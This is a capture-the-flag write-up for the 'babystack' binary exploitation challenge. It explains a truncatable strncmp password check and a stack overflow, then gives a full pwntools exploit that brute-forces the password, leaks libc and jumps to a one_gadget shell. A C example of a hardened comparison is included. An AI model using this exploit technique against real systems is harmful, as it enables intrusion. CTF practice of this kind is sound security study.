
babystack

```
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled
```

There is a stack overflow in copy.

First, strlen computes the length of the given string s, not including the terminating "\0".

strncmp compares only the specified number (size) of characters, while strcmp compares the whole string until a differing character or a "\0" is reached.

So the comparison can be truncated with a 00 byte, using the login comparison, and it can also be brute-forced byte by byte. Then consider whether there is a function address that can be brute-forced and leaked...
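To make the comparison problem described above concrete, here is an added C example. It is not the challenge binary's code or the author's exploit: it assumes the password check has the form strncmp(input, secret, strlen(input)) with a constructed secret, and puts that weak check beside a hardened fixed-length, constant-time comparison. The weak check accepts an empty (00-truncated) input and any correct prefix, which is exactly what makes it a byte-by-byte oracle; the hardened check accepts only the full secret.

```c
#include <stdio.h>
#include <string.h>

#define PASS_LEN 16

/* Constructed sample secret; the real challenge reads its password elsewhere. */
static const char SECRET[PASS_LEN + 1] = "s3cr3t_p4ssw0rd!";

/* Weak check in the shape the write-up describes (an assumption, not the
 * binary's exact code): the compare length is strlen() of the caller's input.
 * An input starting with "\0" has length 0, so zero bytes are compared and
 * strncmp returns 0 ("match"); a correct prefix matches as well.
 * Returns 1 on "match", 0 otherwise. */
int weak_check(const char *input) {
    return strncmp(input, SECRET, strlen(input)) == 0;
}

/* Hardened check: the caller passes the real input length, the length must
 * equal the secret's length, and every byte is compared without an early
 * exit so the result depends only on the full input. Returns 1 only when
 * the whole secret matches. */
int hardened_check(const char *input, size_t input_len) {
    if (input_len != PASS_LEN)
        return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < PASS_LEN; i++)
        diff |= (unsigned char)input[i] ^ (unsigned char)SECRET[i];
    return diff == 0;
}

int main(void) {
    /* Constructed inputs: empty (00-truncated), a 3-byte correct prefix,
     * the full secret, and a full-length near miss. */
    printf("weak     \"\"        -> %d\n", weak_check(""));
    printf("weak     \"s3c\"     -> %d\n", weak_check("s3c"));
    printf("hardened \"\"        -> %d\n", hardened_check("", 0));
    printf("hardened \"s3c\"     -> %d\n", hardened_check("s3c", 3));
    printf("hardened full      -> %d\n", hardened_check(SECRET, PASS_LEN));
    printf("hardened near miss -> %d\n", hardened_check("s3cr3t_p4ssw0rd?", PASS_LEN));
    return 0;
}
```

The two properties that matter for the fix are that the compare length is fixed by the secret rather than by the input, and that the loop runs to the end regardless of where the first mismatch occurs; together they remove both the 00 truncation and the prefix oracle.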

After copy, there is a libc address on the stack; brute-force it to get the libc base.

But I don't know how to get rid of the \x00 in front of this address... or maybe my understanding is wrong ovo???

I looked at what's online... debugging it looks the same as mine; the server is... too slow... can't try it qaq (later 😤

(Oh... two months later I switched to a different VM and it worked again; right after 1\naaaaaa there is an address...)

Because the stack space is not initialized, and the login and copy stack areas overlap, use this to overwrite the return address with a one_gadget.

exp

```python
#!/usr/bin/env python
from pwn import *
import os
context.log_level = 'debug'

binary = "./babystack"
ip = "chall.pwnable.tw"
port = 10205
elf = ELF(binary)

def login(passwd):
    io.sendlineafter(">> ", "1")
    io.sendafter("passowrd :", passwd)
    return io.recvuntil("\n")

def logout():
    io.sendlineafter(">> ", "1")

def copy(copy):
    io.sendlineafter(">> ", "3")
    io.sendafter("Copy :", copy)

def ex():
    io.sendlineafter(">> ", "2")

# Byte-by-byte guess: the comparison length follows the input, so a
# correct prefix plus one more byte is accepted exactly when that byte is right.
def buf(length, cover):
    for i in range(length):
        for q in range(1, 256):
            if 'Login' in login(cover + chr(q) + '\n'):
                cover += chr(q)
                logout()
                break
    return cover

def pwn(ip, port, debug):
    global io
    if debug == 1:
        io = process(binary)
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
        # gdb.attach(io, "b*0x08048819")
        one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
    else:
        io = remote(ip, port)
        libc = ELF("libc_64.so.6")
        one = [0xef6c4, 0x45216, 0x4526a, 0xf0567]
    guess = buf(0x10, "")
    login('\x00' + 'a' * 0x57)
    copy('a' * 0x40)
    logout()
    # 0x7ffb87ac0000---0x7ffb87b2ffc4 <__GI__IO_setvbuf+324>
    libc_base = u64(buf(6, "a" * 0x10 + '1\n' + 'a' * 6)[0x18:].ljust(8, '\x00')) - 324 - 0x4F730 - libc.symbols['__libc_start_main']
    one_gadget = libc_base + one[3]

    payload = '\x00' + 'a' * 0x3f + guess + 'a' * 0x18 + p64(one_gadget)
    login(payload)
    copy('a' * 0x10)
    ex()

    success("libc_base = " + hex(libc_base))
    io.interactive()


if __name__ == '__main__':
    pwn(ip, port, 0)


'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xef6c4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf0567 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
```